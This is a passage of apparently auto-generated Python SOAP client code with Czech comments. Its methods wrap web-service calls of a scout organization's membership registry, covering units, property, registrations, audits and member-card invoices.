UnitRegistrationNumber})
# Upravit nemovitost
def RealtyUpdateRemoveFromCollection(self, ID_Login, ID, ID_RealtyType, GpsLatitude, GpsLongitude, ID_RealtyCollection, IsPower, ValidTo, IsActive, ID_TempFilePhoto, IsAddressAuthenticated, ID_Document, LVNumber, Acreage, RealtyGpsLatitude, RealtyGpsLongitude, CoordinateX, CoordinateY, DisplayName=None, RealtyType=None, Street=None, City=None, Postcode=None, Description=None, Note=None, RealtyCollection=None, ID_OwnerType=None, OwnerType=None, OwnerTypeNote=None, PhotoExtension=None, PhotoFileContent=None, FotogalleryUrl=None, District=None, Storage=None, ParcelNumber=None, RegisterCity=None, CadastralArea=None, ParcelType=None, LandType=None, Unit=None, UnitRegistrationNumber=None):
return self._client.service.RealtyUpdateRemoveFromCollection({"ID_Login": ID_Login, "ID": ID, "ID_RealtyType": ID_RealtyType, "GpsLatitude": GpsLatitude, "GpsLongitude": GpsLongitude, "ID_RealtyCollection": ID_RealtyCollection, "IsPower": IsPower, "ValidTo": ValidTo, "IsActive": IsActive, "ID_TempFilePhoto": ID_TempFilePhoto, "IsAddressAuthenticated": IsAddressAuthenticated, "ID_Document": ID_Document, "LVNumber": LVNumber, "Acreage": Acreage, "RealtyGpsLatitude": RealtyGpsLatitude, "RealtyGpsLongitude": RealtyGpsLongitude, "CoordinateX": CoordinateX, "CoordinateY": CoordinateY, "DisplayName": DisplayName, "RealtyType": RealtyType, "Street": Street, "City": City, "Postcode": Postcode, "Description": Description, "Note": Note, "RealtyCollection": RealtyCollection, "ID_OwnerType": ID_OwnerType, "OwnerType": OwnerType, "OwnerTypeNote": OwnerTypeNote, "PhotoExtension": PhotoExtension, "PhotoFileContent": PhotoFileContent, "FotogalleryUrl": FotogalleryUrl, "District": District, "Storage": Storage, "ParcelNumber": ParcelNumber, "RegisterCity": RegisterCity, "CadastralArea": CadastralArea, "ParcelType": ParcelType, "LandType": LandType, "Unit": Unit, "UnitRegistrationNumber": UnitRegistrationNumber})
# Načíst seznam typů záznamu v katastru
def RegisterTypeAll(self, ID_Login, ID=None, DisplayName=None):
return self._client.service.RegisterTypeAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Upravit komentář registrační vady osoby
def PersonMistakeReportUpdatePerson(self, ID_Login, ID, ID_Person, ID_Unit, ID_UnitRegistration, ID_Mistake, Person=None, UnitRegistrationNumber=None, Unit=None, Mistake=None, DisplayName=None, ParentComment=None):
return self._client.service.PersonMistakeReportUpdatePerson({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_UnitRegistration": ID_UnitRegistration, "ID_Mistake": ID_Mistake, "Person": Person, "UnitRegistrationNumber": UnitRegistrationNumber, "Unit": Unit, "Mistake": Mistake, "DisplayName": DisplayName, "ParentComment": ParentComment})
# Upravit komentář registrační vady jednotky
def UnitMistakeReportUpdateUnit(self, ID_Login, ID, ID_Unit, ID_Mistake, Unit=None, RegistrationNumber=None, Mistake=None, DisplayName=None, ParentComment=None):
return self._client.service.UnitMistakeReportUpdateUnit({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "ID_Mistake": ID_Mistake, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "Mistake": Mistake, "DisplayName": DisplayName, "ParentComment": ParentComment})
# Načtení statistiky dle věku registrací podřízených jednotek (datatable)
def UnitRegistrationAllSubStatsAgeTable(self, ID_Login, ID_Unit, IsExpanded, LastNYears):
return self._client.service.UnitRegistrationAllSubStatsAgeTable({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "IsExpanded": IsExpanded, "LastNYears": LastNYears})
# Načtení statistiky dle typu jednotky registrací podřízených jednotek (datatable)
def UnitRegistrationAllSubStatsTypeTable(self, ID_Login, ID_Unit, IsExpanded, LastNYears):
return self._client.service.UnitRegistrationAllSubStatsTypeTable({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "IsExpanded": IsExpanded, "LastNYears": LastNYears})
# Načtení statistiky dle typu oddílu registrací podřízených oddílů (datatable)
def UnitRegistrationAllSubStatsTroopTable(self, ID_Login, ID_Unit, IsExpanded, LastNYears):
return self._client.service.UnitRegistrationAllSubStatsTroopTable({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "IsExpanded": IsExpanded, "LastNYears": LastNYears})
# Načtení statistiky dle typu oddílu registrací podřízených oddílů
def UnitRegistrationAllSubStatsTroop(self, ID_Login, ID_Unit, IsExpanded, LastNYears):
return self._client.service.UnitRegistrationAllSubStatsTroop({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "IsExpanded": IsExpanded, "LastNYears": LastNYears})
# Načtení statistiky dle typu jednotky registrací podřízených jednotek
def UnitRegistrationAllSubStatsType(self, ID_Login, ID_Unit, IsExpanded, LastNYears):
return self._client.service.UnitRegistrationAllSubStatsType({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "IsExpanded": IsExpanded, "LastNYears": LastNYears})
# Načtení statistiky dle věku registrací podřízených jednotek
def UnitRegistrationAllSubStatsAge(self, ID_Login, ID_Unit, IsExpanded, LastNYears):
return self._client.service.UnitRegistrationAllSubStatsAge({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "IsExpanded": IsExpanded, "LastNYears": LastNYears})
# Načtení statistiky dle věku registrací zadané jednotky (datatable)
def UnitRegistrationAllStatsAgeTable(self, ID_Login, ID_Unit, IsExpanded, LastNYears):
return self._client.service.UnitRegistrationAllStatsAgeTable({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "IsExpanded": IsExpanded, "LastNYears": LastNYears})
# Načtení statistiky dle věku registrací zadané jednotky
def UnitRegistrationAllStatsAge(self, ID_Login, ID_Unit, IsExpanded, LastNYears, PrepareInvertedDatatable):
return self._client.service.UnitRegistrationAllStatsAge({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "IsExpanded": IsExpanded, "LastNYears": LastNYears, "PrepareInvertedDatatable": PrepareInvertedDatatable})
# Načtení statistiky dle kategorie registrací zadané jednotky (datatable)
def UnitRegistrationAllStatsCategoryTable(self, ID_Login, ID_Unit, LastNYears, IsExpanded):
return self._client.service.UnitRegistrationAllStatsCategoryTable({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "LastNYears": LastNYears, "IsExpanded": IsExpanded})
# Načtení statistiky dle kategorie registrací zadané jednotky
def UnitRegistrationAllStatsCategory(self, ID_Login, ID_Unit, LastNYears, IsExpanded):
return self._client.service.UnitRegistrationAllStatsCategory({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "LastNYears": LastNYears, "IsExpanded": IsExpanded})
# Načíst statistiku registrací jednotky
def UnitRegistrationAllStats(self, ID_Login, ID_Unit):
return self._client.service.UnitRegistrationAllStats({"ID_Login": ID_Login, "ID_Unit": ID_Unit})
# Upravit pokyny k registraci
def UnitRegistrationUpdateInstructions(self, ID_Login, ID, ID_Unit, Year, DateChecked, DateConfirmed, IsDelivered, IsAccepted, ID_UnitRegistrationParent, ParentIsDelivered, ParentIsAccepted, ParentHasCreated, Unit=None, RegistrationNumber=None, DisplayName=None, ID_UnitType=None, Instructions=None, UnitRegistrationParent=None, InstructionsParent=None):
return self._client.service.UnitRegistrationUpdateInstructions({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Year": Year, "DateChecked": DateChecked, "DateConfirmed": DateConfirmed, "IsDelivered": IsDelivered, "IsAccepted": IsAccepted, "ID_UnitRegistrationParent": ID_UnitRegistrationParent, "ParentIsDelivered": ParentIsDelivered, "ParentIsAccepted": ParentIsAccepted, "ParentHasCreated": ParentHasCreated, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "DisplayName": DisplayName, "ID_UnitType": ID_UnitType, "Instructions": Instructions, "UnitRegistrationParent": UnitRegistrationParent, "InstructionsParent": InstructionsParent})
# Přepočítání statistiky členů a jednotek v registraci
def UnitRegistrationRebuildMembers(self, ID_Login, ID, Year):
return self._client.service.UnitRegistrationRebuildMembers({"ID_Login": ID_Login, "ID": ID, "Year": Year})
# Přehled registračních komentářů podřízených jednotek
def UnitRegistrationReportChild(self, ID_Login, ID, ShowChildUnit, UnitType=None, RegistrationNumber=None):
return self._client.service.UnitRegistrationReportChild({"ID_Login": ID_Login, "ID": ID, "ShowChildUnit": ShowChildUnit, "UnitType": UnitType, "RegistrationNumber": RegistrationNumber})
# Načtení seznamu roku registraci ustredi
def UnitRegistrationAllYearUstredi(self, ID_Login, ExportFilter):
return self._client.service.UnitRegistrationAllYearUstredi({"ID_Login": ID_Login, "ExportFilter": ExportFilter})
# Načíst detail požadavku pro průvodní dopis
def RegistryDetailExport(self, ID_Login, ID):
return self._client.service.RegistryDetailExport({"ID_Login": ID_Login, "ID": ID})
# upravit poznámku registru OJ
def RegistryUpdateNote(self, ID_Login, ID, Sequence, ID_Unit, IsPropertyOwner, IsPropertyOwnerOld, OldHistoryObjectId, NewHistoryObjectId, ID_PersonCreate, DateCreate, ID_PersonUpdate, DateUpdate, ID_PersonSent, DateSent, ID_PersonClosed, DateClosed, ID_PersonCancel, DateCancel, ID_Function, ID_FunctionType, NewAccount, ID_PersonFunction, ID_PersonFunctionOld, ID_PersonSolving, DateSolving, ID_Document, ID_Statement, StatementYear, ID_DocumentStatement, ID_DocumentDecision, ID_DocumentPropertyAgreement, DisplayName=None, Unit=None, RegistrationNumber=None, IC=None, Street=None, City=None, Postcode=None, PropertyAgreementExtension=None, UnitOld=None, StreetOld=None, CityOld=None, PostcodeOld=None, ID_RegistryObject=None, RegistryObject=None, ID_RegistryType=None, RegistryType=None, ID_RegistryState=None, RegistryState=None, PersonCreate=None, PersonUpdate=None, PersonSent=None, PersonClosed=None, PersonCancel=None, CancelDecision=None, FunctionType=None, PersonFunction=None, PersonFunctionOld=None, Account=None, Note=None, PersonSolving=None, DecisionSeatChangeExtension=None):
return self._client.service.RegistryUpdateNote({"ID_Login": ID_Login, "ID": ID, "Sequence": Sequence, "ID_Unit": ID_Unit, "IsPropertyOwner": IsPropertyOwner, "IsPropertyOwnerOld": IsPropertyOwnerOld, "OldHistoryObjectId": OldHistoryObjectId, "NewHistoryObjectId": NewHistoryObjectId, "ID_PersonCreate": ID_PersonCreate, "DateCreate": DateCreate, "ID_PersonUpdate": ID_PersonUpdate, "DateUpdate": DateUpdate, "ID_PersonSent": ID_PersonSent, "DateSent": DateSent, "ID_PersonClosed": ID_PersonClosed, "DateClosed": DateClosed, "ID_PersonCancel": ID_PersonCancel, "DateCancel": DateCancel, "ID_Function": ID_Function, "ID_FunctionType": ID_FunctionType, "NewAccount": NewAccount, "ID_PersonFunction": ID_PersonFunction, "ID_PersonFunctionOld": ID_PersonFunctionOld, "ID_PersonSolving": ID_PersonSolving, "DateSolving": DateSolving, "ID_Document": ID_Document, "ID_Statement": ID_Statement, "StatementYear": StatementYear, "ID_DocumentStatement": ID_DocumentStatement, "ID_DocumentDecision": ID_DocumentDecision, "ID_DocumentPropertyAgreement": ID_DocumentPropertyAgreement, "DisplayName": DisplayName, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "IC": IC, "Street": Street, "City": City, "Postcode": Postcode, "PropertyAgreementExtension": PropertyAgreementExtension, "UnitOld": UnitOld, "StreetOld": StreetOld, "CityOld": CityOld, "PostcodeOld": PostcodeOld, "ID_RegistryObject": ID_RegistryObject, "RegistryObject": RegistryObject, "ID_RegistryType": ID_RegistryType, "RegistryType": RegistryType, "ID_RegistryState": ID_RegistryState, "RegistryState": RegistryState, "PersonCreate": PersonCreate, "PersonUpdate": PersonUpdate, "PersonSent": PersonSent, "PersonClosed": PersonClosed, "PersonCancel": PersonCancel, "CancelDecision": CancelDecision, "FunctionType": FunctionType, "PersonFunction": PersonFunction, "PersonFunctionOld": PersonFunctionOld, "Account": Account, "Note": Note, "PersonSolving": PersonSolving, "DecisionSeatChangeExtension": DecisionSeatChangeExtension})
# Načíst seznam typů razítka
def StampTypeAll(self, ID_Login, ID=None, DisplayName=None):
return self._client.service.StampTypeAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Načíst detail hospodářského výkazu pro sestavu
def StatementDetailReport(self, ID_Login, ID):
return self._client.service.StatementDetailReport({"ID_Login": ID_Login, "ID": ID})
# Načíst seznam stavů hospodářského výkazu
def StatementStateAll(self, ID_Login, ID=None, DisplayName=None):
return self._client.service.StatementStateAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Upravit stav hospodářského výkazu
def StatementUpdateState(self, ID_Login, ID, ID_Unit, Year, IsError, IsDelivered, DateDelivered, DateCreated, IsThousands, IsConsultant, ID_Document, ID_DocumentTempFile, DateSent, ID_PersonSent, DateConfirmed, ID_PersonConfirmed, ID_Registry, ShowOverview, Unit=None, RegistrationNumber=None, ID_StatementType=None, StatementType=None, ID_StatementState=None, StatementState=None, PersonSent=None, PersonConfirmed=None):
return self._client.service.StatementUpdateState({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Year": Year, "IsError": IsError, "IsDelivered": IsDelivered, "DateDelivered": DateDelivered, "DateCreated": DateCreated, "IsThousands": IsThousands, "IsConsultant": IsConsultant, "ID_Document": ID_Document, "ID_DocumentTempFile": ID_DocumentTempFile, "DateSent": DateSent, "ID_PersonSent": ID_PersonSent, "DateConfirmed": DateConfirmed, "ID_PersonConfirmed": ID_PersonConfirmed, "ID_Registry": ID_Registry, "ShowOverview": ShowOverview, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ID_StatementType": ID_StatementType, "StatementType": StatementType, "ID_StatementState": ID_StatementState, "StatementState": StatementState, "PersonSent": PersonSent, "PersonConfirmed": PersonConfirmed})
# Načíst seznam jednotek pro Google synchronizaci
def UnitAllGoogleGroupSync(self, ID_Login, ID_GoogleGroup):
return self._client.service.UnitAllGoogleGroupSync({"ID_Login": ID_Login, "ID_GoogleGroup": ID_GoogleGroup})
# Načíst seznam jednotek v STS
def UnitAllTelephony(self, ID_Login, ID_Application, ID, ID_Group, RegistrationNumberStartWith, ID_UnitType=None, RegistrationNumber=None, DisplayName=None, Location=None, AccountNumber=None, IC=None):
return self._client.service.UnitAllTelephony({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID, "ID_Group": ID_Group, "RegistrationNumberStartWith": RegistrationNumberStartWith, "ID_UnitType": ID_UnitType, "RegistrationNumber": RegistrationNumber, "DisplayName": DisplayName, "Location": Location, "AccountNumber": AccountNumber, "IC": IC})
# Načíst seznam jednotek pro menu
def UnitAllMenu(self, ID_Login, ID_Application, ID, ID_UnitParent, ID_UnitChild):
return self._client.service.UnitAllMenu({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID, "ID_UnitParent": ID_UnitParent, "ID_UnitChild": ID_UnitChild})
# Načíst seznam evidencí provedených kontrol
def UnitAuditRegisterAllUnit(self, ID_Login, ID_Unit):
return self._client.service.UnitAuditRegisterAllUnit({"ID_Login": ID_Login, "ID_Unit": ID_Unit})
# Naèíst detail zobrazení osoby v adresáři
def CatalogDisplayDetail(self, ID_Login, ID_Person):
return self._client.service.CatalogDisplayDetail({"ID_Login": ID_Login, "ID_Person": ID_Person})
# Upravit zobrazení osoby v adresáři
def CatalogDisplayUpdate(self, ID_Login, ID, ID_Person, Birthday, YearFrom, Adress, PostalAdress, School, Function, Qualification, EducationSeminary, Offer, Education, Membership, Person=None):
return self._client.service.CatalogDisplayUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "Birthday": Birthday, "YearFrom": YearFrom, "Adress": Adress, "PostalAdress": PostalAdress, "School": School, "Function": Function, "Qualification": Qualification, "EducationSeminary": EducationSeminary, "Offer": Offer, "Education": Education, "Membership": Membership, "Person": Person})
# Načíst detail limitu pro vyhledávání osob v adresáři
def CatalogLimitDetail(self, ID_Login, ID_Person):
return self._client.service.CatalogLimitDetail({"ID_Login": ID_Login, "ID_Person": ID_Person})
# Upravit limit pro vyhledávání osob v adresáři
def CatalogLimitUpdate(self, ID_Login, ID_Person, OnlyWeek):
return self._client.service.CatalogLimitUpdate({"ID_Login": ID_Login, "ID_Person": ID_Person, "OnlyWeek": OnlyWeek})
# Načíst seznam fakturačních jednotek
def InvoiceGroupAll(self, ID_Login, ID, ID_TelephonyUnit, DisplayName=None):
return self._client.service.InvoiceGroupAll({"ID_Login": ID_Login, "ID": ID, "ID_TelephonyUnit": ID_TelephonyUnit, "DisplayName": DisplayName})
# Načíst výchozí fakturační jednotku
def InvoiceGroupDetailDefault(self, ID_Login):
return self._client.service.InvoiceGroupDetailDefault({"ID_Login": ID_Login})
# Načíst seznam dokumentů užití nemovitosti
def OccupationPhotoAll(self, ID_Login, ID_Occupation, ID, ID_Document):
return self._client.service.OccupationPhotoAll({"ID_Login": ID_Login, "ID_Occupation": ID_Occupation, "ID": ID, "ID_Document": ID_Document})
# Smazat dokument užití nemovitosti
def OccupationPhotoDelete(self, ID_Login, ID):
return self._client.service.OccupationPhotoDelete({"ID_Login": ID_Login, "ID": ID})
# Založit dokument užití nemovitosti
def OccupationPhotoInsert(self, ID_Login, ID, ID_Occupation, ID_Document, ID_TempFile, Description=None):
return self._client.service.OccupationPhotoInsert({"ID_Login": ID_Login, "ID": ID, "ID_Occupation": ID_Occupation, "ID_Document": ID_Document, "ID_TempFile": ID_TempFile, "Description": Description})
# Načíst detail půjčitelné nemovitosti pro kalendář
def OccupationRentDetailCalendar(self, ID_Login, ID_Application, ID):
return self._client.service.OccupationRentDetailCalendar({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID})
# Načíst seznam půjčitelných nemovitostí pro kalendář
def OccupationRentAllCalendarAll(self, ID_Login, ID_Application, IsInstant):
return self._client.service.OccupationRentAllCalendarAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "IsInstant": IsInstant})
# Načíst seznam půjčitelných jednotek pro API
def OccupationRentAllPublicApi(self, ID_Login, ID_Application):
return self._client.service.OccupationRentAllPublicApi({"ID_Login": ID_Login, "ID_Application": ID_Application})
# Načíst seznam půjčitelných jednotek s detailnímí informacemi pro API
def OccupationRentAllPublicApiDetail(self, ID_Login, ID_Application, ID_RealtyType, Capacity, ID_Items=None, ID_OccupationEquipment=None, ID_RealtyLocations=None):
return self._client.service.OccupationRentAllPublicApiDetail({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_RealtyType": ID_RealtyType, "Capacity": Capacity, "ID_Items": ID_Items, "ID_OccupationEquipment": ID_OccupationEquipment, "ID_RealtyLocations": ID_RealtyLocations})
# Načíst detail půjčitelné jednotky pro API
def OccupationRentDetailPublicApi(self, ID_Login, ID_Application, ID):
return self._client.service.OccupationRentDetailPublicApi({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID})
# Načíst seznam cen za pronájem
def OccupationRentPriceAllOccupationRent(self, ID_Login, ID_Application, ID_OccupationRent):
return self._client.service.OccupationRentPriceAllOccupationRent({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_OccupationRent": ID_OccupationRent})
# Změnit data kalendářů půjčitelné jednotky
def OccupationRentUpdateCalendarFile(self, ID_Login, ID_Application, ID, ID_TempFile, ID_TempFileAdmin):
return self._client.service.OccupationRentUpdateCalendarFile({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID, "ID_TempFile": ID_TempFile, "ID_TempFileAdmin": ID_TempFileAdmin})
# Nastavit datum generování kalendáře
def OccupationRentUpdateRegenerateCalendar(self, ID_Login, ID_Application, ID, Reset):
return self._client.service.OccupationRentUpdateRegenerateCalendar({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID, "Reset": Reset})
# Načíst seznam osob týmu vzdělávací akce
def PersonAllEventEducationTeam(self, ID_Login, ID_EventEducation, DisplayName=None):
return self._client.service.PersonAllEventEducationTeam({"ID_Login": ID_Login, "ID_EventEducation": ID_EventEducation, "DisplayName": DisplayName})
# Založit změnu u osoby zákonným zástupcem
def PersonChangeInsertPersonParent(self, ID_Login, ID_Person):
return self._client.service.PersonChangeInsertPersonParent({"ID_Login": ID_Login, "ID_Person": ID_Person})
# Načtení informací o dětech osoby
def PersonDetailChildren(self, ID_Login, ID):
return self._client.service.PersonDetailChildren({"ID_Login": ID_Login, "ID": ID})
# Načíst seznam potomků osoby
def PersonParentAllPersonChildren(self, ID_Login, ID_Application, ID_Person, ID, ID_PersonParent, ID_ParentType=None):
return self._client.service.PersonParentAllPersonChildren({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Person": ID_Person, "ID": ID, "ID_PersonParent": ID_PersonParent, "ID_ParentType": ID_ParentType})
# Načíst seznam náborových kategorií
def AdvertisingCategoryAllOccupation(self, ID_Login, ID_Application, ID_Occupation, ID_MeetingDate, ID_Sex=None):
return self._client.service.AdvertisingCategoryAllOccupation({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Occupation": ID_Occupation, "ID_MeetingDate": ID_MeetingDate, "ID_Sex": ID_Sex})
# Načíst seznam položek kontroly
def AuditRegisterItemAll(self, ID_Login, ID_UnitAuditRegister, ID, ID_Person, ID_AuditRegisterItemType=None):
return self._client.service.AuditRegisterItemAll({"ID_Login": ID_Login, "ID_UnitAuditRegister": ID_UnitAuditRegister, "ID": ID, "ID_Person": ID_Person, "ID_AuditRegisterItemType": ID_AuditRegisterItemType})
# Smazat položku kontroly
def AuditRegisterItemDelete(self, ID_Login, ID, ID_UnitAuditRegister, Done, ID_Person, IsDone, ID_AuditRegisterItemType=None, AuditRegisterItemType=None, AuditRegisterItemTypeHelp=None, AuditRegisterItemTypeCustom=None, Person=None, Comment=None, HelpCustom=None, DoneText=None):
return self._client.service.AuditRegisterItemDelete({"ID_Login": ID_Login, "ID": ID, "ID_UnitAuditRegister": ID_UnitAuditRegister, "Done": Done, "ID_Person": ID_Person, "IsDone": IsDone, "ID_AuditRegisterItemType": ID_AuditRegisterItemType, "AuditRegisterItemType": AuditRegisterItemType, "AuditRegisterItemTypeHelp": AuditRegisterItemTypeHelp, "AuditRegisterItemTypeCustom": AuditRegisterItemTypeCustom, "Person": Person, "Comment": Comment, "HelpCustom": HelpCustom, "DoneText": DoneText})
# Založit položku kontroly
def AuditRegisterItemInsert(self, ID_Login, ID, ID_UnitAuditRegister, Done, ID_Person, IsDone, ID_AuditRegisterItemType=None, AuditRegisterItemType=None, AuditRegisterItemTypeHelp=None, AuditRegisterItemTypeCustom=None, Person=None, Comment=None, HelpCustom=None, DoneText=None):
return self._client.service.AuditRegisterItemInsert({"ID_Login": ID_Login, "ID": ID, "ID_UnitAuditRegister": ID_UnitAuditRegister, "Done": Done, "ID_Person": ID_Person, "IsDone": IsDone, "ID_AuditRegisterItemType": ID_AuditRegisterItemType, "AuditRegisterItemType": AuditRegisterItemType, "AuditRegisterItemTypeHelp": AuditRegisterItemTypeHelp, "AuditRegisterItemTypeCustom": AuditRegisterItemTypeCustom, "Person": Person, "Comment": Comment, "HelpCustom": HelpCustom, "DoneText": DoneText})
# Upravit položku kontroly
def AuditRegisterItemUpdate(self, ID_Login, ID, ID_UnitAuditRegister, Done, ID_Person, IsDone, ID_AuditRegisterItemType=None, AuditRegisterItemType=None, AuditRegisterItemTypeHelp=None, AuditRegisterItemTypeCustom=None, Person=None, Comment=None, HelpCustom=None, DoneText=None):
return self._client.service.AuditRegisterItemUpdate({"ID_Login": ID_Login, "ID": ID, "ID_UnitAuditRegister": ID_UnitAuditRegister, "Done": Done, "ID_Person": ID_Person, "IsDone": IsDone, "ID_AuditRegisterItemType": ID_AuditRegisterItemType, "AuditRegisterItemType": AuditRegisterItemType, "AuditRegisterItemTypeHelp": AuditRegisterItemTypeHelp, "AuditRegisterItemTypeCustom": AuditRegisterItemTypeCustom, "Person": Person, "Comment": Comment, "HelpCustom": HelpCustom, "DoneText": DoneText})
# Načíst seznam státních občanství
def CitizenshipAll(self, ID_Login, ID_Application, ID=None, DisplayName=None):
return self._client.service.CitizenshipAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID, "DisplayName": DisplayName})
# Načíst seznam typů změny kontaktu
def ContactRequestTypeAll(self, ID_Login, ID=None, DisplayName=None):
return self._client.service.ContactRequestTypeAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Založit semináře účastníkům vzdělavací akci
def EducatationSeminaryInsertEventEducation(self, ID_Login, ID_EventEducation):
return self._client.service.EducatationSeminaryInsertEventEducation({"ID_Login": ID_Login, "ID_EventEducation": ID_EventEducation})
# Načíst detail souhlasu se zápisem do spolkového rejstříku
def FunctionDetailAgreementDownload(self, ID_Login, ID):
return self._client.service.FunctionDetailAgreementDownload({"ID_Login": ID_Login, "ID": ID})
# Načtení informací o osobě pro souhlas se zápisem do spolkového rejstříku
def FunctionDetailAgreementTemplate(self, ID_Login, ID, ID_FunctionType, CityText=None):
return self._client.service.FunctionDetailAgreementTemplate({"ID_Login": ID_Login, "ID": ID, "ID_FunctionType": ID_FunctionType, "CityText": CityText})
# Načíst seznam typů funkcí pro Google synchronizaci
def FunctionTypeAllGoogleGroupSync(self, ID_Login, ID_GoogleGroup, IsDirect):
return self._client.service.FunctionTypeAllGoogleGroupSync({"ID_Login": ID_Login, "ID_GoogleGroup": ID_GoogleGroup, "IsDirect": IsDirect})
# Potvrzení souhlasu se zápisem do spolkového rejstříku
def FunctionUpdateAgreementConfirm(self, ID_Login, ID, ValidFrom, ValidTo, ID_Person, ID_Unit, ID_FunctionType, ID_Role, IsDeleteRole, AgreementConfirmed, ID_TempFile, AgreementNeeded, AgreementCanUpload, AgreementCanConfirm, AgreementCanView, ID_FunctionReason=None, Specification=None, AgreementExtension=None, Code=None, Number=None):
return self._client.service.FunctionUpdateAgreementConfirm({"ID_Login": ID_Login, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_FunctionType": ID_FunctionType, "ID_Role": ID_Role, "IsDeleteRole": IsDeleteRole, "AgreementConfirmed": AgreementConfirmed, "ID_TempFile": ID_TempFile, "AgreementNeeded": AgreementNeeded, "AgreementCanUpload": AgreementCanUpload, "AgreementCanConfirm": AgreementCanConfirm, "AgreementCanView": AgreementCanView, "ID_FunctionReason": ID_FunctionReason, "Specification": Specification, "AgreementExtension": AgreementExtension, "Code": Code, "Number": Number})
# Nahrát souhlas se zápisem do spolkového rejstříku
def FunctionUpdateAgreement(self, ID_Login, ID, ValidFrom, ValidTo, ID_Person, ID_Unit, ID_FunctionType, ID_Role, IsDeleteRole, AgreementConfirmed, ID_TempFile, AgreementNeeded, AgreementCanUpload, AgreementCanConfirm, AgreementCanView, ID_FunctionReason=None, Specification=None, AgreementExtension=None, Code=None, Number=None):
return self._client.service.FunctionUpdateAgreement({"ID_Login": ID_Login, "ID": ID, "ValidFrom": ValidFrom, "ValidTo": ValidTo, "ID_Person": ID_Person, "ID_Unit": ID_Unit, "ID_FunctionType": ID_FunctionType, "ID_Role": ID_Role, "IsDeleteRole": IsDeleteRole, "AgreementConfirmed": AgreementConfirmed, "ID_TempFile": ID_TempFile, "AgreementNeeded": AgreementNeeded, "AgreementCanUpload": AgreementCanUpload, "AgreementCanConfirm": AgreementCanConfirm, "AgreementCanView": AgreementCanView, "ID_FunctionReason": ID_FunctionReason, "Specification": Specification, "AgreementExtension": AgreementExtension, "Code": Code, "Number": Number})
# Načíst seznam fakturovaných časopisů
def MemberCardAllMemberCardInvoiceSummaryVat(self, ID_Login, ID_MemberCardInvoice):
return self._client.service.MemberCardAllMemberCardInvoiceSummaryVat({"ID_Login": ID_Login, "ID_MemberCardInvoice": ID_MemberCardInvoice})
# Načíst faktury za členské karty jednoty
def MemberCardInvoiceAllUnit(self, ID_Login, ID_Unit, ID, DateGeneratingFrom, DateGeneratingTo, DisplayName=None, ID_MemberCardInvoiceState=None):
return self._client.service.MemberCardInvoiceAllUnit({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID": ID, "DateGeneratingFrom": DateGeneratingFrom, "DateGeneratingTo": DateGeneratingTo, "DisplayName": DisplayName, "ID_MemberCardInvoiceState": ID_MemberCardInvoiceState})
# Načíst seznam faktur za členské karty v xml
def MemberCardInvoiceAllXml(self, ID_Login, ID_Unit, ID, ID_MemberCardInvoiceGenerate, DateGeneratingFrom, DateGeneratingTo, DisplayName=None, ID_MemberCardInvoiceState=None):
return self._client.service.MemberCardInvoiceAllXml({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID": ID, "ID_MemberCardInvoiceGenerate": ID_MemberCardInvoiceGenerate, "DateGeneratingFrom": DateGeneratingFrom, "DateGeneratingTo": DateGeneratingTo, "DisplayName": DisplayName, "ID_MemberCardInvoiceState": ID_MemberCardInvoiceState})
# Načíst detail faktury za členské karty
def MemberCardInvoiceDetailDownloadPdf(self, ID_Login, ID):
return self._client.service.MemberCardInvoiceDetailDownloadPdf({"ID_Login": ID_Login, "ID": ID})
# Upravit fakturu za členské karty
def MemberCardInvoiceUpdate(self, ID_Login, ID, ID_Unit, Sequence, Maturity, DateGenerating, TotalPrice, TotalPriceWithVat, Price, PriceBase, PriceFirst, PriceSecond, VatBase, VatFirst, VatSecond, ID_MemberCardInvoiceGenerate, ID_InvoiceGroup, DateTaxableSupply, Unit=None, RegistrationNumber=None, Street=None, City=None, Postcode=None, State=None, StateCode=None, IC=None, DIC=None, DisplayName=None, ID_MemberCardInvoiceState=None, MemberCardInvoiceState=None, InvoiceGroupContractorIC=None, InvoiceGroupContractorDIC=None, InvoiceGroupContractorPhone=None, InvoiceGroupContractorEmail=None, InvoiceGroupWeb=None, InvoiceGroupFileReference=None, InvoiceGroupBankAccount=None, InvoiceGroupBankCode=None, InvoiceGroupBank=None, PaymentType=None, QRCodeString=None, InvoiceGroupContractor=None, InvoiceGroupContractorAddress=None, InvoiceBankAccount=None):
